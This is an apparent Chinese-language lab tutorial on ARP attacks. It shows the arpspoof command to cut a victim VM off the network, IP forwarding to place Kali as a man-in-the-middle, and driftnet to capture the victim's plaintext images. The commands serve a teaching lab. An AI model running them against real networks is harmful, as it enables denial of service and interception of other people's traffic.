网络协议与攻击模拟_03实施ARP欺骗和攻击

Zkaisen2024-01-14 17:51

一、ARP攻击

1、实验环境

  • kali Linux (安装arpspoof工具)
  • 被攻击主机

2、kali配置

kali Linux系统是基于debian Linux系统,采用deb包管理方式,可以使用apt源的方式进行直接从源的安装。

  • 配置kali网络源

    vim /etc/apt/sources.list

    apt-get-update

  • 安装工具

    apt-get install dsniff

3、实验步骤

(1)准备工作

  • windows虚拟机与kali虚拟机的IP和MAC地址如下:
  • 开始Windows可正常访问网络

(2)实施攻击

复制代码 
arpspoof -i eth0 -t 被攻击主机IP地址 被攻击主机网关地址

kali 不停向被攻击主机发送ARP响应,告诉被攻击主机网关的MAC地址是0:c:29:e2:44:49

(3)攻击效果

被攻击主机无法访问网络

  • winshark&arp缓存情况

被攻击主机无法进行网络通信

如果出现了响应报文过多,还跟有可能就是遭受了ARP攻击。

二、实施ARP欺骗

1、开启攻击机的IP转发

开启kali的IP转发

bash 复制代码 
vim /proc/sys/net/ipv4/ip_forward
#这个文件写1代表开启,写0代表关闭

echo 1 >> /proc/sys/net/ipv4/ip_forward

2、被攻击主机可访问网络

  • windows发出的所有数据都会经过kali进行转发。
  • kali自带抓包工具winshark可以抓包看看

如果遇到kali自带的winshark闪退请使用以下命令更新:

bash 复制代码 
apt update &&apt upgrade &&apt dist-upgrade

3、driftne监听工具

(抓取被攻击主机上明文的图片)

bash 复制代码 
#安装driftnet
apt-get install driftnet
#启用driftnet
driftnet -i ethernet0
相关推荐
cur1es15 分钟前
【UDP的报文结构】
网络·网络协议·udp·md5
闲人编程38 分钟前
使用FastAPI和WebSocket构建高性能实时聊天系统
websocket·网络协议·网络编程·fastapi·持久化·实时聊天·codecapsule
惊讶的猫42 分钟前
OpenFeign(声明式HTTP客户端)
网络·网络协议·http·微服务·openfeign
心.c1 小时前
TCP协议深入解析
网络·网络协议·tcp/ip
摇滚侠1 小时前
HTTP 404 - No response body available
网络·网络协议·http
全栈工程师修炼指南2 小时前
Nginx | stream content 阶段:TCP 协议四层反向代理浅析与实践
运维·网络·网络协议·tcp/ip·nginx
任白3 小时前
OSI参考模型&&TCP/IP模型
网络协议
不做菜鸟的网工3 小时前
OSPF协议笔记整理
网络协议
tzy2335 小时前
极简版本的 TCP / IP 协议栈介绍
网络·网络协议·tcp/ip
tod1135 小时前
TCP全连接队列与tcpdump抓包
网络·网络协议·tcp/ip·github·tcpdump
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03OpenClaw Chrome扩展使用教程 - 浏览器中继控制04Linux下V2Ray安装配置指南05UV安装并设置国内源06openclaw配置教程(linux+局域网ollama)07使用 1panel面板 部署 php网站08从零搭建一个 PHP 登录注册系统(含完整源码)09Vue-skills的中文文档10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南